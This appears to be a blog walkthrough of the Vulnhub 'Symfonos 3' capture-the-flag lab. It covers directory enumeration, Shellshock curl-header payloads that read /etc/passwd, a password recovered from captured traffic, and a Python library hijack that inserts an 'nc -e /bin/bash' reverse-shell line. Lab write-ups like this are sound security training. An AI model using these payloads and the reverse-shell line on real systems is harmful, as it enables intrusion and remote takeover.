Vulnhub – Symfonos 3 Walkthrough

Scanning the target with nmap –A –T4 –p- –vv

Now on port 80 we’re going to use dirsearch as dirsearch -u -w /usr/share/dirb/wordlist/big.txt -e txt,php and we came to find several directories:






Inside /gate/Cerberus/tartarus using curl –v:

So maybe im in the wrong direction, so let’s try the cgi-bin and server-status directories but using gobuster:

gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Now we found the underworld:

Ok the page is about uptime display:

Ok i searched google and it’s a shellshock code with bash CGI script we can use curl -v -H “custom:() { ignored; }; /usr/bin/id”

It worked, let’s tweak the code a bit curl -v -H “custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd “

So far its working we can now get a shell using CGI apache script using metasploit:

Using script i found a tcpdump file we can take advantage of using tcpdump –D

After sometime transfer the file output.pcap to your machine and read it as tcpdump -qns 0 -A -r output.pcap

We got user hades and password PTpZTfU4vxgzvRBE now we login using ssh service

Got nothing, well i used pspy32 tool to see what’s going on and i found this:

Viewing the file

Ok the file ftplip is in the directory /usr/lib/python2.7 and the file is writable:

We can add our line to the file:

os.system(“nc -e /bin/bash 4444”)

And now we wait for a bit and we will get a shell back to our listening port nc –nlvp 4444

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s